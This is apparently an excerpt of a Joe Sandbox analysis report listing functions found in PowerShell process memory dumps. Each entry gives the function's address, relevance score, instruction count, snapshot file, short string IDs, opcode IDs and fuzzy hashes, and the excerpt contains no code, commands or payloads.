                                                                    • Source File: 00000002.00000002.2189856780.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff848f50000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: `I$`I$`I
                                                                    • API String ID: 0-3777321524
                                                                    • Opcode ID: cc24fd446a71034b83283e9a6211831d2c0fb511a591216db2d59a20c74d7d48
                                                                    • Instruction ID: 6aa655916404ccf80d16561a0439c54bd1dcb5494714988bb8d22dc457c802d2
                                                                    • Opcode Fuzzy Hash: cc24fd446a71034b83283e9a6211831d2c0fb511a591216db2d59a20c74d7d48
                                                                    • Instruction Fuzzy Hash: 6FF11771E0EAD61FE39AA73858662B5BBE1EF62350F0801FED04DC71D3DE199805835A
                                                                    Function 00007FF848F5AC86 Relevance: 3.9, Strings: 3, Instructions: 171COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2189856780.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff848f50000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: `*I$`*I$`*I
                                                                    • API String ID: 0-2724454403
                                                                    • Opcode ID: 974b517c635aa407d94c81a9d911f9e2cffa2a8885209698580365f52f338d17
                                                                    • Instruction ID: 9fa864351128fc1093010e866d09cd5c64b9b520393da696d25fed24e89a22f5
                                                                    • Opcode Fuzzy Hash: 974b517c635aa407d94c81a9d911f9e2cffa2a8885209698580365f52f338d17
                                                                    • Instruction Fuzzy Hash: F151C431E0EA854FE756AB2898552A8FBE1FF55750F1800FEC049871D3DE28AC858746
                                                                    Function 00007FF848F5A522 Relevance: 2.9, Strings: 2, Instructions: 428COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2189856780.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff848f50000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (*I$(*I
                                                                    • API String ID: 0-2856555260
                                                                    • Opcode ID: 0827f22d8695977dceecddda8b548255f7b0dab3591ba26fb21f6031efb45bbd
                                                                    • Instruction ID: 95f01343baf0db6b83841ec2c6353eec2d110d5297e60e7c86d3e5b3a991c643
                                                                    • Opcode Fuzzy Hash: 0827f22d8695977dceecddda8b548255f7b0dab3591ba26fb21f6031efb45bbd
                                                                    • Instruction Fuzzy Hash: 99C13432E0EA894FE796AB2864546B4BBE1EF55750F1801FBC04CC71D3DB18AC96C395
                                                                    Function 00007FF848F5A760 Relevance: 2.6, Strings: 2, Instructions: 125COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2189856780.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff848f50000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (*I$(*I
                                                                    • API String ID: 0-2856555260
                                                                    • Opcode ID: 848ac9af928416cc5164a83b2f9fb7d283ab97af14b4f4aca05a393abf4a98ef
                                                                    • Instruction ID: a1a9f79a24ab9c142d180af07925e94aed538e50c1e936085cc20cc874049899
                                                                    • Opcode Fuzzy Hash: 848ac9af928416cc5164a83b2f9fb7d283ab97af14b4f4aca05a393abf4a98ef
                                                                    • Instruction Fuzzy Hash: 3341E131E0EBC54FEB56AB685854664BFF0EF26241F1900FBD448CB1D3DB189899C356
                                                                    Function 00007FF848F54A84 Relevance: 1.3, Strings: 1, Instructions: 97COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2189856780.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff848f50000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: `I
                                                                    • API String ID: 0-3764126254
                                                                    • Opcode ID: 41b70daa0c2b679b166eccbad2cceb45021ec29ffc3a29f5e1452922dee15a11
                                                                    • Instruction ID: 0b7e1b2d675b535a24ea416c7c6195d8956adb6d08ed308898fa106ed8ba86ef
                                                                    • Opcode Fuzzy Hash: 41b70daa0c2b679b166eccbad2cceb45021ec29ffc3a29f5e1452922dee15a11
                                                                    • Instruction Fuzzy Hash: 9A210471E1EE6A5FF3A9BB281445275A6E2EF613A0F5801BAD01DC71D3EE18AC01424D
                                                                    Function 00007FF848E8E930 Relevance: .7, Instructions: 723COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2189251561.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff848e80000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 86125f32b2c22ea32348971bfc9340cac1d0d3bf480591b173af117ef4c50945
                                                                    • Instruction ID: d39e75177c5d5bd79a15ea0828a4458aaaa5a7cd806b409eb4ca7649bb040f2b
                                                                    • Opcode Fuzzy Hash: 86125f32b2c22ea32348971bfc9340cac1d0d3bf480591b173af117ef4c50945
                                                                    • Instruction Fuzzy Hash: EAF14F30E1CA4A8FDF98EF58C455AAD7BE1FF68340F54416AE409D7296CB34E881CB85
                                                                    Function 00007FF848F57B42 Relevance: .4, Instructions: 403COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2189856780.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff848f50000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bf5c3abb4dd08c6f3017da9336a27e92fe17d7b38da6258425b261a3d2e63f8d
                                                                    • Instruction ID: bea7ebf31aa817bd9c932d6d680b2ae12dcd1b2a873da3325aef9a2a007333a0
                                                                    • Opcode Fuzzy Hash: bf5c3abb4dd08c6f3017da9336a27e92fe17d7b38da6258425b261a3d2e63f8d
                                                                    • Instruction Fuzzy Hash: 1BC11731E0DE8A5FE7A5AB289855275BBE1EF95390F1801BEC04DC71D3DF29AC068349
                                                                    Function 00007FF848E8BC36 Relevance: .4, Instructions: 384COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2189251561.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff848e80000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cbe675ae01226f483a6c6acdea2159618d38165c631a3b0fdaf0429858febf9a
                                                                    • Instruction ID: a8620ae8d630153c0b689a4c1ec050a19c5c0cc80dff8aeed7cc2cd77800a401
                                                                    • Opcode Fuzzy Hash: cbe675ae01226f483a6c6acdea2159618d38165c631a3b0fdaf0429858febf9a
                                                                    • Instruction Fuzzy Hash: CDD1A33090CA8D8FEBA9EF28C8557E937D1FF55350F44416AE84DC7292CB34A945CB86
                                                                    Function 00007FF848F5589D Relevance: .4, Instructions: 366COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2189856780.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff848f50000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bcc82ca3859cdaa57069faa4d023eaad8f1ba67ccaf811193f229a25045d1bc2
                                                                    • Instruction ID: 456ebc90ded6f194201d4aa0e64f4b6675a96dd5d5189a0acf47170eca3747bf
                                                                    • Opcode Fuzzy Hash: bcc82ca3859cdaa57069faa4d023eaad8f1ba67ccaf811193f229a25045d1bc2
                                                                    • Instruction Fuzzy Hash: ABB14731E0EA8A4FE799AB6C58556B4BBE1EF5A3A0F1801FBD00DC71D3DE18AC058345
                                                                    Function 00007FF848F5AF2A Relevance: .2, Instructions: 216COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2189856780.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff848f50000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5fc495fb9145a772816b257cb8ecdd1b41ee5c7f7fb5c1713999b1b910e4f327
                                                                    • Instruction ID: 714a8b2f698025436bec5993036ad4a066744e6301e60410a4e028180696d247
                                                                    • Opcode Fuzzy Hash: 5fc495fb9145a772816b257cb8ecdd1b41ee5c7f7fb5c1713999b1b910e4f327
                                                                    • Instruction Fuzzy Hash: FF61D431A0EBC54FE757AB3858646A4BFE1EF56250F0901FBC048CB5E3DB189849C396
                                                                    Function 00007FF848F5B496 Relevance: .2, Instructions: 176COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2189856780.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff848f50000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 45bfcf91a8fce8eed11831ce4f447b89e2a28f9f4999f2bd796a069e9b9bf9fe
                                                                    • Instruction ID: c1faebe7f5513fdb0c5bef812db35cbe7aa2f08415abd3ef14df768b89965a33
                                                                    • Opcode Fuzzy Hash: 45bfcf91a8fce8eed11831ce4f447b89e2a28f9f4999f2bd796a069e9b9bf9fe
                                                                    • Instruction Fuzzy Hash: 8E51A131E1EA868FE759AB2858552B8FBE1FF65750F1800FEC049871D3DF28AC458746
                                                                    Function 00007FF848F5A016 Relevance: .2, Instructions: 175COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2189856780.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff848f50000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1a96d247d007a786f18851798d9dd816121075fe52ba8617a21816ef11783944
                                                                    • Instruction ID: 62a3314b3456df22f0141e992c7201726d1c249b0eb4889f58698b51f64ebd05
                                                                    • Opcode Fuzzy Hash: 1a96d247d007a786f18851798d9dd816121075fe52ba8617a21816ef11783944
                                                                    • Instruction Fuzzy Hash: B951D432E1EA865FE759AB2858512A8FBE1FF56750F1801FEC04C871C3DE28AC858746
                                                                    Function 00007FF848F559C2 Relevance: .1, Instructions: 108COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2189856780.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff848f50000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d4134237a045b2fc6027a8818fdde0666bc495cf8ed6881f63072f42ef69b844
                                                                    • Instruction ID: 1d1d4511c0c587e25bb36437dfdb832829303742418af1b660fe37759e905be3
                                                                    • Opcode Fuzzy Hash: d4134237a045b2fc6027a8818fdde0666bc495cf8ed6881f63072f42ef69b844
                                                                    • Instruction Fuzzy Hash: 0C31D231D2EA875FF3A9A76818511B8AAE1EF497A0F5801BAD01DD71D3EF0C7C04439A
                                                                    Function 00007FF848E8B734 Relevance: .1, Instructions: 92COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2189251561.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff848e80000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 398e1c79a98544d47c0c7a82df3f67a5dc4d7933ffbec117a48d89debf94d018
                                                                    • Instruction ID: 20cd07caffe844af088d2fb21407863487785ac039d2e685d5b227f16443967f
                                                                    • Opcode Fuzzy Hash: 398e1c79a98544d47c0c7a82df3f67a5dc4d7933ffbec117a48d89debf94d018
                                                                    • Instruction Fuzzy Hash: D531DA3081D64E8EFBB8AF58CC1ABFD3294FF85395F800639D80D87192DB796985CA15
                                                                    Function 00007FF848F519EF Relevance: .1, Instructions: 80COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2189856780.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff848f50000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a71c3a492f81d22dbf7981ef57a2b3b0d9b48ca8a230a2f95dff1ae00c0f95c1
                                                                    • Instruction ID: 0265ad7a65ba49f98c3f29c5df793c705b334cfad07867285cb15f335a23d6db
                                                                    • Opcode Fuzzy Hash: a71c3a492f81d22dbf7981ef57a2b3b0d9b48ca8a230a2f95dff1ae00c0f95c1
                                                                    • Instruction Fuzzy Hash: A321D762E0EAC65FF396AB3C28151746ED1EF56694F0904FAD048C71D3DD1C5C89436A
                                                                    Function 00007FF848F59CBB Relevance: .1, Instructions: 58COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2189856780.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff848f50000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f09345f42afc5f2ac981b09be7e1a0d98a9f4f89d7a10fcabed19cc5dfa0bc87
                                                                    • Instruction ID: 5230e5130f67c791db7ef9ea932c4ed19d58a0b6a59caa3136ac8e0ee26eaeb7
                                                                    • Opcode Fuzzy Hash: f09345f42afc5f2ac981b09be7e1a0d98a9f4f89d7a10fcabed19cc5dfa0bc87
                                                                    • Instruction Fuzzy Hash: C3012631F0EA861FE79BEB286865974B7E1EF26750B0C05FAC00DCB5C7DA089C448395
                                                                    Function 00007FF848E83945 Relevance: .0, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2189251561.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff848e80000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                    • Instruction ID: fbd3b9e7071c40a77c15b56bc6ded56dca8f6be253a73c72c42cd1986e3f836f
                                                                    • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                    • Instruction Fuzzy Hash: 7A01A73010CB0C4FDB44EF0CE051AAAB3E0FB85360F10052DE58AC3651D732E881CB45
                                                                    Function 00007FF848F58149 Relevance: .0, Instructions: 30COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2189856780.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff848f50000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ed2bd94cd95e1dd63f4d2e43ef4648544e5ff9e9537a3435a13d0832b23ef655
                                                                    • Instruction ID: 6b2c091b118883c7ecc0d49c8cb6ba028386fa90b46d60e8f833308b1b3517ee
                                                                    • Opcode Fuzzy Hash: ed2bd94cd95e1dd63f4d2e43ef4648544e5ff9e9537a3435a13d0832b23ef655
                                                                    • Instruction Fuzzy Hash: DDE0D832F2DE050DF749661D39020F9B3D1EF81170B481C7FD14EC3483D916A8160345

                                                                    Executed Functions

                                                                    Function 07106DF0 Relevance: 15.8, Strings: 12, Instructions: 802COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2378630230.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7100000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q
                                                                    • API String ID: 0-958751914
                                                                    • Opcode ID: 71eb257f38f153c8e64b50caa52aabad82bc92e2ee1041c4528825d5e0908f36
                                                                    • Instruction ID: 54d0affa6c4c82dace61178405a87413ac8919b7bbee474310ff59de4483ac8a
                                                                    • Opcode Fuzzy Hash: 71eb257f38f153c8e64b50caa52aabad82bc92e2ee1041c4528825d5e0908f36
                                                                    • Instruction Fuzzy Hash: 3B628070A00205CFDB29CB98C951B9EBBB6EF88704F108499D905AF3D5CB75ED41CBA1
                                                                    Function 071031C0 Relevance: 9.1, Strings: 7, Instructions: 368COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2378630230.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7100000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$4']q$tP]q$tP]q$$]q$$]q$$]q
                                                                    • API String ID: 0-108373575
                                                                    • Opcode ID: 796f888331f8adb53aabb4216604043b6b69ff2c58a71bf391e0345676385913
                                                                    • Instruction ID: 86738570660cf4f150d436d5334ec8a881391f73102f3ecd69d0787e3aca1348
                                                                    • Opcode Fuzzy Hash: 796f888331f8adb53aabb4216604043b6b69ff2c58a71bf391e0345676385913
                                                                    • Instruction Fuzzy Hash: 33C138706053859FC7268B688854666BFB5AF86310F19C49FD864CF2E2CB75CC45C7E1
                                                                    Function 07107A5B Relevance: 4.2, Strings: 3, Instructions: 456COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2378630230.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7100000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$4']q$4']q
                                                                    • API String ID: 0-705557208
                                                                    • Opcode ID: 3840e1adeff5043f299a4f099960a0530d9e9d368dc5e3f474e896570b9d8423
                                                                    • Instruction ID: 816e386182213e21a649adc04d80e21244b6540d7fa00bd910163cb71e626923
                                                                    • Opcode Fuzzy Hash: 3840e1adeff5043f299a4f099960a0530d9e9d368dc5e3f474e896570b9d8423
                                                                    • Instruction Fuzzy Hash: 22027D74A002049FDB15CB58C981BAEBBB2EF88704F15C495D905AF3D5CB76ED82CBA1
                                                                    Function 071051F8 Relevance: 3.5, Strings: 2, Instructions: 982COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2378630230.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7100000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$4']q
                                                                    • API String ID: 0-3120983240
                                                                    • Opcode ID: 49be0fbbbf7fae842f382e0a9ec34a4770c61029a77c16e4382d54f5d923f6f4
                                                                    • Instruction ID: c72da8efb7d4cfb760eb52b72c07fef2988a0b66c29686576ce02de70e8446a0
                                                                    • Opcode Fuzzy Hash: 49be0fbbbf7fae842f382e0a9ec34a4770c61029a77c16e4382d54f5d923f6f4
                                                                    • Instruction Fuzzy Hash: 91926BB4B00215DFD724CB58C955B69BBB3EF89314F1080A9D919AB381CBB6ED81CF91
                                                                    Function 0710746B Relevance: 2.9, Strings: 2, Instructions: 395COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2378630230.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7100000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$4']q
                                                                    • API String ID: 0-3120983240
                                                                    • Opcode ID: 2e91dff12bb9e03b4dc4886fe558d4e0ed48aad2d0772e5935570b635a998aef
                                                                    • Instruction ID: c047cef7d8dff10f19b27093e7a29f5d4841d46a633c11442cfa129a45b43190
                                                                    • Opcode Fuzzy Hash: 2e91dff12bb9e03b4dc4886fe558d4e0ed48aad2d0772e5935570b635a998aef
                                                                    • Instruction Fuzzy Hash: 57F1B270B002148FDB24DB68CE55BAEBBB7AF88700F108495D509AF3D5CB75AD818BA1
                                                                    Function 0710885B Relevance: 2.7, Strings: 2, Instructions: 185COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2378630230.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7100000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$4']q
                                                                    • API String ID: 0-3120983240
                                                                    • Opcode ID: 99391c3761b8ce9110b756598216e1cede8833265c477b6ecd324e07bbd3b4bb
                                                                    • Instruction ID: 93821ef1525ea7514dbf0e4c5170aaafdd521c2b680b135cb06f13dc3006c0ec
                                                                    • Opcode Fuzzy Hash: 99391c3761b8ce9110b756598216e1cede8833265c477b6ecd324e07bbd3b4bb
                                                                    • Instruction Fuzzy Hash: FA519CB0708206CFCB2AAF7C845566A7BD2AFC5604B1484A6D541CF2D2DF71D811C7E2
                                                                    Function 0710910E Relevance: 2.6, Strings: 2, Instructions: 116COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2378630230.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7100000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$4']q
                                                                    • API String ID: 0-3120983240
                                                                    • Opcode ID: 2e143845daafad05e92f41f85368a34972f2ce0b71f018c2b980f4dfb4377416
                                                                    • Instruction ID: 31804d9505f92960b347113df5028e052c4e3c368f085596d1471feb9706d287
                                                                    • Opcode Fuzzy Hash: 2e143845daafad05e92f41f85368a34972f2ce0b71f018c2b980f4dfb4377416
                                                                    • Instruction Fuzzy Hash: DC31BEF17042018FCB19A678957427ABBA6DFC6328B10487ADA02CB3D6DFB1D805C3E1
                                                                    Function 071051D8 Relevance: 2.0, Strings: 1, Instructions: 790COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2378630230.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7100000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q
                                                                    • API String ID: 0-1259897404
                                                                    • Opcode ID: 66a908c82227a8e2c2f7f622d63ada760ecf4436a9374b2f09f7cca4127bb699
                                                                    • Instruction ID: 789445021b74c3a28f469500c6143f6b4de5e90c1b9985b1ec3a1be7d62d233e
                                                                    • Opcode Fuzzy Hash: 66a908c82227a8e2c2f7f622d63ada760ecf4436a9374b2f09f7cca4127bb699
                                                                    • Instruction Fuzzy Hash: 44725CB4A00215DFD724CB18C981B69BBB3EF89314F14C199D919AB381CBB2ED91CF91
                                                                    Function 07105E74 Relevance: 1.8, Strings: 1, Instructions: 533COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2378630230.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7100000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q
                                                                    • API String ID: 0-1259897404
                                                                    • Opcode ID: 5b2eba17d66a0bf9f892ecdb5ab46994df5d2690a917a1d7d2512371bef77806
                                                                    • Instruction ID: 53b33b434714a4df4d8d7307bb02dfa12e367a80c26495a905f8e73c4660929c
                                                                    • Opcode Fuzzy Hash: 5b2eba17d66a0bf9f892ecdb5ab46994df5d2690a917a1d7d2512371bef77806
                                                                    • Instruction Fuzzy Hash: E53269B4B00215DFD7258B18C941FA9BBB3EF85714F1480A9D91A6B381CBB2ED91CF91
                                                                    Function 07106250 Relevance: .3, Instructions: 252COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2378630230.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7100000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 625b50db3d929616de7bcec82ad7969c8a694c02ecd0886de0811c6ed4a7e803
                                                                    • Instruction ID: 3fe762473fad75354c657b2068b6c72e656b239807af8dea34e7fe6feaaa8c03
                                                                    • Opcode Fuzzy Hash: 625b50db3d929616de7bcec82ad7969c8a694c02ecd0886de0811c6ed4a7e803
                                                                    • Instruction Fuzzy Hash: F6A1C174A00205DFC705CB69CA51B9ABBB2EF89354F1480A9E405AF3D6CB76EC45CBE1
                                                                    Function 07106278 Relevance: .2, Instructions: 247COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2378630230.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7100000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9998849604f78baae6de73d29fdf154e9924471c765173fca6b6f8850d3bf53b
                                                                    • Instruction ID: bbb51284ae0b4fe9775c3c2da9f79073a6f445c22e63f40e1dd08ac54fc406f4
                                                                    • Opcode Fuzzy Hash: 9998849604f78baae6de73d29fdf154e9924471c765173fca6b6f8850d3bf53b
                                                                    • Instruction Fuzzy Hash: 06919E70B002049FC714DB68CA55BAABBB6EF88354F108068E905AF3D5CB76EC41CBE1
                                                                    Function 07106238 Relevance: .2, Instructions: 207COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2378630230.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7100000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 80f18353b181aba5033e03a973c68485b60399e214855a14996d9f73ef45a8fc
                                                                    • Instruction ID: 31905f0bd80c0abdf0e258d43fae3435354a882d85d857dd8b78664721288523
                                                                    • Opcode Fuzzy Hash: 80f18353b181aba5033e03a973c68485b60399e214855a14996d9f73ef45a8fc
                                                                    • Instruction Fuzzy Hash: AF816DB0B00205DFD714CB59CA85BAABBB2EF88754F108469E505AF3D5CB76EC41CBA1
                                                                    Function 07108266 Relevance: .1, Instructions: 102COMMON
